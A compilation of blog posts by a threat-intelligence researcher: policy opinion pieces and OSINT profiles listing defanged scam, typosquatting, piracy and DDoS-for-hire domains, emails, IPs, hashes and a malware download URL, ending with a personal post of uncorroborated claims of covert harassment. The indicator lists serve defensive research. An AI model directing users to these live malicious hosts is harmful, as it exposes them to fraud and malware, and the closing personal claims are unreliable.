• Indicators of Compromise - the vary basics of formulating a new buzz-word for what was once a proprietary-

term coined by the Intelligence Community to populate and disseminate actionable nation-state Cyberspace

data to a variety of defensive and offensive Cyber Warfare Units can be best described as a New Age in the

area of responsive and proactive OSINT type of acquisition methodologies that can be best described as a new

way to acquire leaked and potentially data-and-resource exposure in a variety of automated ways. Generalizing
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the very basics of the Threat Intelligence market segment in the context of potential Indicators of Compromise leaks can be best tackled in a way of offering central repositories including "government-free" access including

a nation-state Early Warning System for potential Cyberspace threat data including a variety of Indicators of

Compromise to prevent wide-spread data and information leaks further protecting the U.S Government from

current and emerging threats.

• Corporate Sector Data Mining Should Considered - what was once best known as "conducting cyber espionage

through botnets" including the conducting of "cyber espionage through data mining of malware-infected corpo-

rate networks" can be best described as today’s proposed central Incident Response based central-repository

empowering the U.S Intelligence Community with the necessary data and expertise to stay ahead and act upon

current and emerging cyber threats.

• Private Sector Cooperation and the "You Wish" mentality - the general assumption that the private sector will continue to cooperate and empower the U.S Intelligence Community with the necessary data information and

knowledge should be considered a wrong approach on the U.S Intelligence Community’s way to further protect

the U.S national infrastructure including the proactive response to current and emerging cyber threats. What

can be best done to further protect the U.S Government from current and emerging threats can be best de-

scribed as a modern central-repository of "government-free" access based Cyber Threat Data type of platform.

• Slicing the Threat on Pieces Should be Ignored - What can be best described as the process of slicing the threat

"on pieces" is today’s modern World of PR agencies and Threat Intelligence market segment intermediaries

including the active labeling of a particular group of interest or an individual as a separate entry leading to an

overall mis-confusion in the context of actually providing actionable Threat Intelligence to the U.S Intelligence

Community that could ultimately better protect the U.S National Infrastructure. With the mainstream media

continuing to raise the buzz around popular terms and newly coined cyber threat actor groups in the face of the

rise of the advanced persistent threat media-buzz generating initiative it should be clearly noted that the overall

irrelevance of labeling a specific cyber threat actor in the public domain should be considered as an irrelevant

exercise in the broad context of providing the U.S Intelligence Community with the necessary data information

and knowledge to stay ahead of current and emerging cyber threats.

• Tactics Techniques and Procedures Should Be Buzz-Word Ignored - The very basics of coining a term term

for the purpose of describing what can be best described as a general cyber threat methodology known as

qualitative assessment should be considered as a possible flag raising operation that should be considered as

a possible source for mis-confusion in terms of the broader context of discussing and reacting to current and

emerging cyber threats.

• The Rise of the "Threat Hunter" Cyber Security Career Position Is Already Causing Headaches - The rise of

the "Threat Hunter" career position can be best described as a complete failure to understand the basics that

drive today’s modern Cyber Warfare Team including possible defensive and offensive Cyber Warfare Units and

Cyber Operations Groups. With everyone "interested" in becoming a Cyber Warrior including a possible "Threat

Hunter" it should be noted that the over-supply of private-sector companies stealing revenue from Uncle Sam

for the purpose of enriching and disseminating actionable Threat Intelligence is overly increasing resulting in

the overall demise of what was once a proprietary technology and know-how in the hands of a few that truly

grasped the market and its potential successfully serving the needs of the U.S government for years to come.

• The Rise of Secondary Markets for IOCs Should Provide "Government-free" Access - The general over-supply

of market-segment driven repositories of actionable Threat Intelligence data should be greatly attributed to a

variety of factors including the rise of the Threat Intelligence market segment and should be considered as a

way for the U.S Intelligence Community to clearly seek a technical and potentially market-segment relevant way

to populate a potential Cyber Threats data-base using public and proprietary sources with a clear "government-

free" access in mind.
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Current Proposals to U.S Intelligence Community in Terms of Threat Intelligence and Nation-State Actors:

• Clusted Activity - Taking into consideration the fact that on the majority of occasions the majority of quality

Threat Intelligence type of data is publicly obtainable using a variety of public and potentially proprietary sources

is should be considered feasibly possible for the U.S Intelligence community to build manage and operate a

proactive-based Cyber Threats anticipating platform including a possible Early Warning Based type of OSINT-

capable system able to anticipate and act upon current and emerging threats with a possible cluster-based

type of data mining and information processing capabilities potentially serving the needs of the U.S Intelligence

Community.

• Government-free Access - The very notion that an Indian-based company will successfully manage launch and

operate a Threat Intelligence business should be largely ignored for the very sake of figuring out a way to ob-

tain access to a particular company’s Threat Intelligence data information and knowledge citing potential Nation

Security issues. What should be considered in terms of obtaining access to a company’s data-base citing poten-

tial National Security issues is the so called notion of "government-free" access based type of private sector

partnership.

• Talent Acquisition Roles - In today’s modern Talent Acquisition Wars it should be clearly noted that a select set

of key individuals can greatly contribute to the overall demise of cybercrime internationally taking into consid-

eration the overall demise of the "Wisdom of the Crowds" market-segment driven-concept. What should be

considered when hiring a potential top-notch Cyber Warfare and Information Warfare-based type of personnel

shouldn’t be necessary years and decades worth of experience but the overall disruptive degree of the individ-

ual in terms of "making a change" and "making an impact" compared to a certification-based-driven crowd of individuals.
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• Central Repository - What the modern U.S Intelligence Community can better do to better protect the nation’s Infrastructure should be considered in something in the lines of a central-private-sector driven repository of

Threat Intelligence type of data including the notion of a "government-free" access in terms of obtaining access

to a public or a proprietary company information and data assets.

1. https://fas.org/irp/doddir/dod/jp3_12.pdf

2. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html
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Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfo-

lio Spotted in the Wild (2019-02-07 10:14)

The time has come to profile a recently intercepted and currently active malicious and fraudulent re-shipping money

mule recruitment fraudulent campaign successfully enticing users into interacting with the rogue and bogus content

potentially risk-forwarding the risk of the fraudulent transaction to the unsuspecting user.

Sample malicious URL:

hxxp://yourshippingpanel.com

Sample Mailing Address:

One World Trade Center, New York, NY, 10007, USA

+1 (606) 879-0046

Sample Company Description:

" Your Shipping Panel LLC" is successfully positioning the company "Founded in 1995, is a package delivery company with services to Eastern Europe as well as to all the countries of the former Soviet Union. Over the years, Your

Shipping Panel LLC has grown into an industry leader by focusing on the goal of connecting customers in the United

States with their families, friends and businesses in Eastern Europe. This also includes e-commerce between those

countries. Today, Your Shipping Panel LLC has become a dominant force in package delivery with services to Ukraine,

Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan and Armenia. Our specialized

transportation and logistics services to those countries lead the way as the most recognized brand in North America. "

Sample Screenshots of The Related Web Sites Known to Have Been Involved in the Campaign:
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Related domains known to have participated in the campaign:

hxxp://meestshipping.com

hxxp://www.bellwordcourier.site

hxxp://unitedmorganexpresslogistics.com

hxxp://fastexmega-delivery.com

hxxp://supremelight-globaldelivery.com

hxxp://mngcargocourier.com

hxxp://fastex-uk.com

hxxp://bequem-gh.com

hxxp://diamonddeliverys.com

hxxp://leadasialogistic.com

hxxp://diplomatcourierservices.com

hxxp://solacec.com
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Stay tuned for an additional portfolio of re-shipping money mule recruitment scam domains to be published

anytime soon.
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Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild

(2019-02-07 10:51)

Continuing the series of post detailing the activities of currently circulating malicious and fraudulent spam campaigns

successfully targeting potential money mule recruiters I’ve recently came across to Global Postal Express which

basically:

" We Provide best in service global logistics through our people by building lasting relationships with the com-

mitment to prioritize our customer needs to generate financial results. Be the leader in the development of integrated

logistics strategies by offering the highest levels of quality, reliability and exceptional customer service while strategi-cally growing nationally and internationally. "

Sample malicious URL known to have participated in the campaign:

hxxp://globalpostalexpress.net - Email: globalpostalexpressinc@gmail.com

Sample Mailing Address:

2549 Harris Ave, Sacramento,CA 95838, U.S.A

+1 (719) 838 2416

Sample Screenshots of the Service in Action:
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Sample Screenshots of the Related Malicious Domains Known to Have Participated in the Campaign:
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Related malicious URLs known to have to participated in the campaign:

hxxp://www.marannata.com

hxxp://wellburton.com

hxxp://stecoexpress.com
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hxxp://mag-trading.com

St ay tuned for an additional set of details regarding re-shipping money mule recruitment domain portfolios anytime

soon.
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Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild

(2019-02-07 12:14)

I’ve recently intercepted a currently circulating malicious and fraudulent spam campaign successfully impersonating

" Able Express Courier Service" to utilize a re-shipping mule recruitment scam potentially targeting tens of thousands of unsuspecting users globally.

Sample malicious URL known to have participated in the campaign:

hxxp://ablecs.biz - 104.31.82.184 - Email: phyllisjhurst@grr.la

Sample Mailing Address:

PO Box 34459

Bartlett, TN 38184-0459

United States

+1 (888) 597-5808

The service is positioning itself as " Able Express Courier Service has been providing forwarding services for

more than three years now. Our staff consists of experienced professionals who regularly get certified and verified for

competency. Over the years, Test Compant inc has delivered packages to a variety of places and gained many major

business partners all around the world. "

Sample Screenshots of the Malicious and Fraudulent Service:
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St ay tuned for an additional set of det ails regarding re-shipping money mule recruitment scams to be publishe

anytime soon.
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Historical OSINT - Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious

Domains Portfolio (2019-02-07 15:47)

With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of malicious released including

a variety of typosquatted domains it shouldn’t be surprising that hundreds of thousands of users continue falling

victim to fraudulent and malicious malware and exploits serving schemes.

In this post I’ll profile a currently active fraudulent and malicious typosquatted domain portfolio successfully

impersonating Facebook and Twitter for the purpose of enticing users into interacting with the rogue and malicious

domains.

Related domains known to have participated in the campaign:

hxxp://sm-url.info

hxxp://sm-urls.info

hxxp://smurls.info

hxxp://smirl.info
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hxxp://smalladdr.info

hxxp://sm-irl.info

hxxp://tnylnk.info

hxxp://tnysite.info

hxxp://smalink.info

hxxp://profilelink.info

hxxp://muypix.info

hxxp://profilehoster.info

hxxp://quiklynk.info

hxxp://tnyur.info

hxxp://skurls.info

hxxp://smrls.info

hxxp://smulrs.info

hxxp://snurls.info

hxxp://link-out.info

hxxp://make-small.info

hxxp://make-tiny.info

hxxp://makesmall.info

hxxp://maketiny.info

hxxp://maketny.info

hxxp://mehprofile.info

hxxp://muhprofile.info

hxxp://quickprofile.info

hxxp://quiklink.info

hxxp://quikprofile.info

hxxp://small-url.info

hxxp://smalllink.info

hxxp://tinyout.info

hxxp://go-out.info

hxxp://out-link.info

hxxp://tny-url.info

hxxp://posta-link.info

hxxp://tiny-out.info

hxxp://private-pics.info

hxxp://private-pix.info

hxxp://coool-pics.info

hxxp://sxypics.info

hxxp://sxypix.info

hxxp://my-link-out.info

hxxp://my-lynk.info

hxxp://go-to-my-pix.info

hxxp://my-profile-lnk.info

hxxp://smaller-link.info

hxxp://smaller-urls.info

hxxp://pics-url.info

hxxp://pix-url.info

hxxp://quick-pix.info

hxxp://quick-profile.info

hxxp://pics-links.info

hxxp://pix-links.info

433

hxxp://check-my-pics.info

hxxp://check-my-profile.info

hxxp://check-my-link.info

hxxp://click-links.info

hxxp://my-photo-profile.info

hxxp://photo-profile.info

hxxp://my-video-profile.info

hxxp://video-profile.info

hxxp://hotvideoprofile.info

hxxp://my-videos-profile.info

hxxp://myphotoprofile.info

hxxp://mypictureprofile.info

hxxp://mysexyphotos.info

hxxp://mysexypix.info

hxxp://mysexyvideos.info

hxxp://mysexyvids.info

hxxp://mysxyphotos.info

hxxp://mysxypics.info

hxxp://mysxypictures.info

hxxp://mysxyprofile.info

hxxp://mysxyvideos.info

hxxp://mysxyvids.info

hxxp://myvideoprofile.info

hxxp://myvideosprofile.info

hxxp://profile-link.info

hxxp://sxyprofiles.info

hxxp://myhotphotos.info

hxxp://myhotpictures.info

hxxp://myhotprofile.info

hxxp://myhotvideos.info

hxxp://myhotvids.info

hxxp://my-photos-r-cool.info

hxxp://my-profile-page.info

hxxp://my-cool-profile.info

hxxp://my-photo-spot.info

hxxp://my-profile-spot.info

hxxp://my-video-spot.info

hxxp://myphotopages.info

hxxp://myprofilepages.info

hxxp://photo-pages.info

hxxp://profile-pages.info

hxxp://videoz-profile.info

hxxp://myphoto-gallery.info

hxxp://myphoto-spot.info

hxxp://myvideo-spot.info

hxxp://myvideospot.info

hxxp://show-my-pictures.info

hxxp://show-my-videos.info

hxxp://show-my-vids.info

hxxp://show-off-pics.info
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hxxp://show-off-vids.info

hxxp://show-your-photos.info

hxxp://check-my-page.info

hxxp://show-my-picx.info

hxxp://show-my-vidds.info

hxxp://my-profile-site.info

hxxp://profile-sites.info

hxxp://profile-space.info

hxxp://view-my-profile.info

hxxp://view-profile.info

hxxp://profile-link2.info

hxxp://profile-link3.info

hxxp://profile-link4.info

hxxp://profile-link5.info

hxxp://profile-link6.info

hxxp://profile-link7.info

hxxp://profile-link8.info

hxxp://twitpic-1.info

hxxp://twitpic-2.info

hxxp://twitpic-3.info

hxxp://twitpic-4.info

hxxp://my-pictures-domain.info

hxxp://photo-profile-sites.info

hxxp://picture-profile-site.info

hxxp://picture-profile-sites.info

hxxp://picture-profiles.info

hxxp://video-profile-site.info

hxxp://video-profile-sites.info

hxxp://myprofile-site.info

hxxp://photo-gallery-sites.info

hxxp://photogallery-site.info

hxxp://photogallery-sites.info

hxxp://theprofileiste.info

hxxp://photo-galleries-1.info

hxxp://photo-galleries-10.info

hxxp://photo-galleries-2.info

hxxp://photo-galleries-3.info

hxxp://photo-galleries-4.info

hxxp://photo-galleries-5.info

hxxp://photo-galleries-6.info

hxxp://photo-galleries-7.info

hxxp://photo-galleries-8.info

hxxp://photo-galleries-9.info

hxxp://unrated-profiles-1.info

hxxp://unrated-profiles-10.info

hxxp://unrated-profiles-2.info

hxxp://unrated-profiles-3.info

hxxp://unrated-profiles-4.info

hxxp://unrated-profiles-5.info

hxxp://unrated-profiles-6.info
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hxxp://unrated-profiles-7.info

hxxp://unrated-profiles-8.info

hxxp://unrated-profiles-9.info

hxxp://unrated-profile-1.info

hxxp://unrated-profile-10.info

hxxp://unrated-profile-2.info

hxxp://unrated-profile-3.info

hxxp://unrated-profile-4.info

hxxp://unrated-profile-5.info

hxxp://unrated-profile-6.info

hxxp://unrated-profile-7.info

hxxp://unrated-profile-8.info

hxxp://unrated-profile-9.info

hxxp://r-rated-photos-1.info

hxxp://r-rated-photos-10.info

hxxp://r-rated-photos-2.info

hxxp://r-rated-photos-3.info

hxxp://r-rated-photos-4.info

hxxp://r-rated-photos-5.info

hxxp://r-rated-photos-7.info

hxxp://r-rated-photos-8.info

hxxp://r-rated-photos-9.info

hxxp://r-rated-profile-1.info

hxxp://r-rated-profile-10.info

hxxp://r-rated-profile-2.info

hxxp://r-rated-profile-3.info

hxxp://r-rated-profile-4.info

hxxp://r-rated-profile-5.info

hxxp://r-rated-profile-6.info

hxxp://r-rated-profile-7.info

hxxp://r-rated-profile-8.info

hxxp://r-rated-profile-9.info

hxxp://unrated-gallery-1.info

hxxp://unrated-gallery-10.info

hxxp://unrated-gallery-2.info

hxxp://unrated-gallery-3.info

hxxp://unrated-gallery-4.info

hxxp://unrated-gallery-5.info

hxxp://unrated-gallery-6.info

hxxp://unrated-gallery-7.info

hxxp://unrated-gallery-8.info

hxxp://unrated-gallery-9.info

hxxp://profile-unrated-1.info

hxxp://profile-unrated-10.info

hxxp://profile-unrated-2.info

hxxp://profile-unrated-3.info

hxxp://profile-unrated-4.info

hxxp://profile-unrated-5.info

hxxp://profile-unrated-6.info

hxxp://profile-unrated-7.info

436

hxxp://profile-unrated-8.info

hxxp://profile-unrated-9.info

hxxp://iprosa.com

hxxp://sm-urls.com

hxxp://snkirl.com

hxxp://tnulk.com

hxxp://smulx.com

hxxp://tnysnorl.com

hxxp://supalnk.com

hxxp://tnyweb.com

hxxp://smlnk.com

hxxp://profilehoster.com

hxxp://make-small.com

hxxp://my-link-out.com

hxxp://url-out.com

hxxp://profile-out.com

hxxp://tiny-out.com

hxxp://posta-link.com

hxxp://coool-pics.com

hxxp://twitpics-1.com

hxxp://twitpics-4.com

hxxp://twitpics-2.com

hxxp://twitpics-3.com

hxxp://profile-video-gallery.com

hxxp://fb-photo-gallery.com

hxxp://fb-gallery.com

hxxp://profile-photo-gallery.com

hxxp://profilegallerysite.com

hxxp://profilepicturesite.com

hxxp://my-profile-gallery.com

hxxp://profile-gallery.com

hxxp://profile-galleries.com

hxxp://her-profile-pictures.com

hxxp://her-picture-sites.com

hxxp://her-photo-site.com

hxxp://gallery-link.com

hxxp://her-photo-sites.com

hxxp://her-profile-photos.com

hxxp://her-profile-out.com

hxxp://her-profiles.com

hxxp://her-picture-site.com

hxxp://photosites-now.com

hxxp://photos-for-fb.com

hxxp://photosforfb.com

hxxp://photo-galleries-onilne.com

Stay tuned for an updated set of typosquatted malicious and fraudulent domains impersonating popular brands to

be published anytime soon.

437





Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

(2019-02-07 17:27)

In a cybercrime-ecosystem dominated by fraudulent and malicious releases cybercriminals continue relying on

fraudulent and potentially-malicious affiliate-based type of revenue-sharing schemes for the purpose of serving

fraudulent and malicious software to thousands of unsuspecting users including OEM-powered pirated software to

millions of users globally.

In this post I’ll profile a currently active fraudulent and malicious domain portfolio of OEM-powered pirated-

software serving fraudulent and malicious domains.

Related domains known to have participated in the campaign:

hxxp://store-software-7.com - Email: altsrv@gmail.com

hxxp://oem-store-software-7.com - Email: altsrv@gmail.com

hxxp://store-digital-software-7.com - Email: altsrv@gmail.com

hxxp://oem-digital-software-7.com - Email: altsrv@gmail.com

hxxp://shop-digital-software-7.com - Email: altsrv@gmail.com

hxxp://buy-shop-software-7.com - Email: altsrv@gmail.com

hxxp://buyshop-software-7.com - Email: altsrv@gmail.com

hxxp://store-buy-software-7.com - Email: altsrv@gmail.com

hxxp://digital-shopsoftware-7.com - Email: altsrv@gmail.com

hxxp://buy-shopsoftware-7.com - Email: altsrv@gmail.com

hxxp://digitalbuysoftware-7.com - Email: altsrv@gmail.com

hxxp://software-digital-store-7.com - Email: altsrv@gmail.com

hxxp://buy-shop-digital-7.com - Email: altsrv@gmail.com

hxxp://buyshop-digital-7.com - Email: altsrv@gmail.com

hxxp://buy-soft-digital-7.com - Email: altsrv@gmail.com

hxxp://soft-buy-digital-7.com - Email: altsrv@gmail.com

hxxp://softbuy-digital-7.com - Email: altsrv@gmail.com

hxxp://softwaredigital-7.com - Email: altsrv@gmail.com

hxxp://buy-softdigital-7.com - Email: altsrv@gmail.com

hxxp://softbuydigital-7.com - Email: altsrv@gmail.com

hxxp://storesoftware-oem-7.com - Email: altsrv@gmail.com

hxxp://digitalsoftware-oem-7.com - Email: altsrv@gmail.com

hxxp://store-oem-7.com - Email: altsrv@gmail.com

hxxp://soft-buy-oem-7.com - Email: altsrv@gmail.com

hxxp://digital-storeoem-7.com - Email: altsrv@gmail.com

hxxp://digitaloem-7.com - Email: altsrv@gmail.com

hxxp://digital-buyoem-7.com - Email: altsrv@gmail.com

hxxp://digitalbuy-shop-7.com - Email: altsrv@gmail.com

hxxp://buyoem-soft-7.com - Email: altsrv@gmail.com

hxxp://digital-buy-soft-7.com - Email: altsrv@gmail.com

hxxp://digitalbuy-soft-7.com - Email: altsrv@gmail.com

hxxp://digital-buysoft-7.com - Email: altsrv@gmail.com

hxxp://digitalbuysoft-7.com - Email: altsrv@gmail.com

hxxp://shopsoftware-buy-7.com - Email: altsrv@gmail.com

hxxp://software-store-buy-7.com - Email: altsrv@gmail.com

hxxp://digitalshop-buy-7.com - Email: altsrv@gmail.com

hxxp://digital-soft-buy-7.com - Email: altsrv@gmail.com

hxxp://digitalsoft-buy-7.com - Email: altsrv@gmail.com

438

hxxp://software-digitalbuy-7.com - Email: altsrv@gmail.com

hxxp://oem-digitalbuy-7.com - Email: altsrv@gmail.com

hxxp://softdigitalbuy-7.com - Email: altsrv@gmail.com

hxxp://digital-softbuy-7.com - Email: altsrv@gmail.com

hxxp://digitalsoftbuy-7.com - Email: altsrv@gmail.com

hxxp://digitaltributary.com - Email: altsrv@gmail.com

hxxp://oemstore-software-7.ru - Email: mikepanin1990@gmail.com

hxxp://digital-buy-software-7.ru - Email: mikepanin1990@gmail.com

hxxp://shop-buy-software-7.ru - Email: mikepanin1990@gmail.com

hxxp://buydigitalsoftware-7.ru - Email: mikepanin1990@gmail.com

hxxp://digital-buysoftware-7.ru - Email: mikepanin1990@gmail.com

hxxp://buysoftware-store-7.ru - Email: mikepanin1990@gmail.com

hxxp://software-buy-store-7.ru - Email: mikepanin1990@gmail.com

hxxp://buysoftwarestore-7.ru - Email: mikepanin1990@gmail.com

hxxp://oem-digitalstore-7.ru - Email: mikepanin1990@gmail.com

hxxp://software-oemstore-7.ru - Email: mikepanin1990@gmail.com

hxxp://store-digital-7.ru - Email: mikepanin1990@gmail.com

hxxp://storeoem-digital-7.ru - Email: mikepanin1990@gmail.com

hxxp://oembuy-digital-7.ru - Email: mikepanin1990@gmail.com

hxxp://shop-softwaredigital-7.ru - Email: mikepanin1990@gmail.com

hxxp://softwarebuydigital-7.ru - Email: mikepanin1990@gmail.com

hxxp://store-software-oem-7.ru - Email: mikepanin1990@gmail.com

hxxp://buy-software-oem-7.ru - Email: mikepanin1990@gmail.com

hxxp://software-digital-oem-7.ru - Email: mikepanin1990@gmail.com

hxxp://storedigital-oem-7.ru - Email: mikepanin1990@gmail.com

hxxp://softwareoem-7.ru - Email: mikepanin1990@gmail.com

hxxp://digitalsoftwareoem-7.ru - Email: mikepanin1990@gmail.com

hxxp://softwarestoreoem-7.ru - Email: mikepanin1990@gmail.com

hxxp://buysoftwareshop-7.ru - Email: mikepanin1990@gmail.com

hxxp://software-digitalshop-7.ru - Email: mikepanin1990@gmail.com

With software piracy continuing to increase and proliferate it shouldn’t be surprising that rogue and fraudu-

lent affiliate-based type of networks will continue to make impact globally potentially exposing millions of user to a

variety of risks including malicious software.

Stay tuned for an updated set of fraudulent and malicious piracy-themed portfolio of domains to be published

anytime soon.
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Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Cam-

paign - 2010 (2019-02-07 17:30)

Remember the massive [1]Russia vs Georgia cyber attack circa 2009? It seems that the time has come for me to

dig a little bit deeper and provide [2]actionable intelligence on one of the actors that seem to have participated in

the campaign including a sample Pro-Georgian type of Cyber Militia that apparently attempted to "risk-forward" the

responsibility for waging Cyberwar to third-parties including Russian and Anti-Georgia supporters.

How come? In this post I’ll provide actionable intelligence on what appears to be a currently active Brazilian

supporter of the Cyber Attacks that took place circa 2009 with the idea to discuss in-depth the tools and motivation

for launching the campaign of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://geocities.ws/thezart/
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It’s 2010 and I’m coming across to a malicious and fraudulent file repository that can be best described as a

key actor that managed to participate perhaps even orchestrate the Russia vs Georgia cyber attacks circa 2009. Who

is this individual? How did he manage to contribute to the Russian vs Georgia cyber attacks? Did he rely on active

outsourcing or was he hired to perform the orchestrated DDoS for hire attacks that took place back then? Keep

reading.

It appears that a Brazilian user known as The Zart managed to participated in the Russia vs Georgia cyber at-

tacks circa 2009 relying on a variety of tools and techniques known as:

- DNS Amplification Attacks

- Web Site Defacement Tools

- Targeted Spreading of Vulnerable Legitimate Web Sites

- Automated Web-Site Exploitation - Long Tail of The Malicious Web

which basically resulted in a self-mobilized militia that actually participated and launched the Russia vs Geor-

gia cyber attacks circa 2009.

Related posts:

[3]The Russia vs Georgia Cyber Attack

[4]Who’s Behind the Georgia Cyber Attacks?

[5]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks

[6]Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks

1. http://georgiaupdate.gov.ge/doc/10006922/CYBERWAR-%20fd_2_.pdf

2. http://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and.html
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3. https://ddanchev.blogspot.com/2008/08/the-russia-vs-georgia-cyber-attack.html

4. https://ddanchev.blogspot.com/2008/08/who-behind-georgia-cyber-attacks.html

5. https://ddanchev.blogspot.com/2008/10/ddos-attack-graphs-from-russia-vs.html

6. https://ddanchev.blogspot.com/2008/10/real-time-osint-vs-historical-osint-in.html
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Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam Domains (2019-02-07 17:56)

It’s been a while since I last posted a quality update profiling a versatile currently circulating malicious and fraudulent

spam campaign profiling and highlighting the fraudulent and malicious activities of the cybercriminals behind the

campaign.

In this post I’ll profile a currently circulating Fake Visa Application fraudulent campaign enticing users into sub-

mitting their personal details for the purpose of obtaining a fake and rogue visa.

Related emails known to have participated in the campaign:

vizagold2010@mail.ru

qwerty _ok@bigmir.net

vizacom10@bigmir.net

Abrakadabra011@yandex.ua

alexboy40@meta.ua

vizacom09@bigmir.net

bestagancy@rambler.ru

vizagold2010@mail.ru

vizagold2010@gmail.com

vizacom01@ua.fm

Vizacom01@gmail.com

Vizacom01@ukr.net

Vizacom01@qip.ru

visas _com@ukr.net

Visas.com2010@gmail.com

infinite-visas@rambler.ru

unforeseen2010@hotmail.com

shengen _visas@ukr.net

shengenvisas@gmail.com

shengenvisas@rambler.ru

shengenvisas@bigmir.net

Stay tuned for an updated set of malicious and fraudulent Fake Visa Application domain portfolio to be pub-

lished anytime soon.
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Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of The RAT (2019-02-07 18:03)

It’s 2010 and I’ve recently came across to the following announcement at Sub7’s Main Forum - the most ubiquitous

trojan horse also known as Remote Access Tool circa the 90’s on the upcoming release of a new version.

" People can buy unique FUD servers in the shop and custom clients can also be written to help you admin PC’s

remotely with your own features. These are selling well so be sure to grab your own custom version while we are

offering them at this price. Please be advised there is currently a waiting list for this. "

Sample detection rate:

- [1]borlndmm.dll - Result: 0/42 (0 %)

- [2]EditServer.exe - Result: 10/42 (23.81 %)

- [3]Server.exe - Result: 18/41 (43.91 %)

- [4]SubSeven.exe - Result: 16/41 (39.03 %)

Should The Scene the way we know it re-appear the way we know it? It appears that every then and now a

new cybercrime-friendly tool is trying to materialize taking us back to what used to be The Scene circa the 90’s.

1. https://www.virustotal.com/bg/file/23b0241109dea46fcd433d25a48e41f95cf2d7ea589f72f4e2948706de3e0657/analys

is/

2. https://www.virustotal.com/bg/file/35e843125f2ef10925c856a0a39000a8df368fb8499cd0d47d12b5de728a222c/analys

is/

3. https://www.virustotal.com/bg/file/2ba3217268b2d737a542e7b7840a4480c655b2b9414d4c57e8b1c8bfa76322c8/analys

is/

4. https://www.virustotal.com/bg/file/0d0d9ba70ab502cd1a61d0913ae9e9853131079e22881a2f527bf699029824ad/analys

is/
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Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer" (2019-02-07 20:30)

Appreciate my rhetoric. In this post I’ll provide actionable intelligence on a key DDoS for hire service that was pri-

marily used in the [1]Russia vs Georgia Cyber Attacks circa 2009 including the [2]DDoS attack against Bobbear.co.uk.

Related actionable intelligence on the campaign:

hxxp://setx.in - Email: info@antiddos.eu - setx.mail@gmail.com - hxxp://httpdoc.info - hxxp://fakamaza.info. The

last one with the email address "team@russia-vs-georgia.org" in the WHOIS info.

Related malicious URLs known to have participated in the campaign:

hxxp://cxim.inattack.ru/www7/www/auth.php

Related malicious URLs known to have participated in the campaign:

hxxp://h278666y.net/main/load.exe

hxxp://h278666y.net/www/auth.php

Related malicious MD5s known to have participated in the campaign:

MD5: 34413180d372a9e66d0d59baf0244b8f
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MD5: 42e4bbd47d322ec563c86c636c3f10b9

MD5: ed36b42fac65236a868e707ee540c015

MD5: c9fa1c95ab4ec1c1d46abe5445fb41e4

hxxp://cxim.inattack.ru/www3/www/

hxxp://i.clusteron.ru/bstatus.php

Related malicious URLs known to have participated in the campaign:

hxxp://svdrom.cn

Related malicious URLs known to have participated in the campaign:

hxxp://203.117.111.52/www7/www/getcfg.php

Related malicious domains known to have participated in the campaign:

hxxp://cxim.inattack.ru/www2/www/stat.php

hxxp://cxim.inattack.ru/www3/www/stat.php

hxxp://cxim.inattack.ru/www4/www/stat.php

hxxp://cxim.inattack.ru/www5/www/stat.php

hxxp://cxim.inattack.ru/www6/www/stat.php

hxxp://finito.fi.funpic.org/black/stat.php

hxxp://logartos.org/forum/stat.php - 195.24.78.242

hxxp://weberror.cn/be1/stat.php

hxxp://prosto.pizdos.net/ _lol/stat.php

hxxp://h278666y.net/www/stat.php - 72.233.60.254

1. https://ddanchev.blogspot.com/2019/02/historical-osint-peek-inside-georgia.html

2. https://ddanchev.blogspot.com/2008/11/the-ddos-attack-against-bobbearcouk.html
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Announcing Offensive Warfare 2.0 - Official Hacking and Security Community Launch (2019-03-22 15:14)

Dear blog readers, I wanted to let everyone know that I’ve recently launched a public [1]hacking and cyber security

community repository offering Security Directory Downloads Podcasts and Security Videos directory including a

countless number of hacking and security resources including a possible hacking and security discussion including

community-based services and products - to keep the spirit of the Scene and the Security Industry - the way we know it.

How to obtain access?

- consider approaching me at dancho.danchev@hush.com for the purpose of requesting an invite

How you can contribute?

- feel free to approach your colleagues and friends including social network in terms of spreading the word about the

portal and the community

- consider registering making an introduction and starting to contribute with content

- approach me directly at - dancho.danchev@hush.com with your questions and possible feature and content

suggestion

Looking forward to receiving your response including any additional questions or comments including sugges-

tions that you might have in terms of the project.

Stay tuned!

1. https://www.offensive-warfare.com/login/
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April
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Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two (2019-04-04 05:51)

[1]

UPDATE: I can be reached at dancho.danchev@hush.com or at +359 87 68 93 890 in case of an emergency.

UPDATE: It appears that recently a car belonging to local police department (hxxp://troyan-police.com; police _troyan@abv.bg) was stopped somewhere around my place with the lights turned on with the idea to provoke a

possible local police visit.

UPDATE: It appears that my place was visited for a second time by local police officers (hxxp://troyan-police.com; police _troyan@abv.bg) with third-party doctors (http://mbal-troyan.com; mbal _troyan@abv.bg) for the purpose of apparently injecting me and a document for the injection was signed by someone that I know.

UPDATE: It appears that someone managed to twist my arm and therefore pressed a pressure on my eye

without my knowledge with random people attempting to communicate with me behind a wall.

UPDATE: It appears that prior to my presentation at InfoSec 2012 someone managed to place a plaque on the

wall in Earl’s Court and therefore I experienced a pressure on my head while making a presentation.

UPDATE: It appears that prior to my presentation visit in Lyon in 2010 someone managed to wound my mouth with

something that can be described as wall interference.

UPDATE: It appears that someone managed to open my eye and therefore I’m currently experiencing a pres-

sure behind a wall with random people attempting to communicate with me.

UPDATE: It appears that I’m currently persistently experiencing a pressure on my mouth including something

in the lines of a toxic chemical on my nose.

UPDATE: It appears that someone managed to map my place including my head and body using rubber and is

persistently trying to communicate with me.

UPDATE: In case you’re interested in contacting me in terms of my law enforcement issues and potential

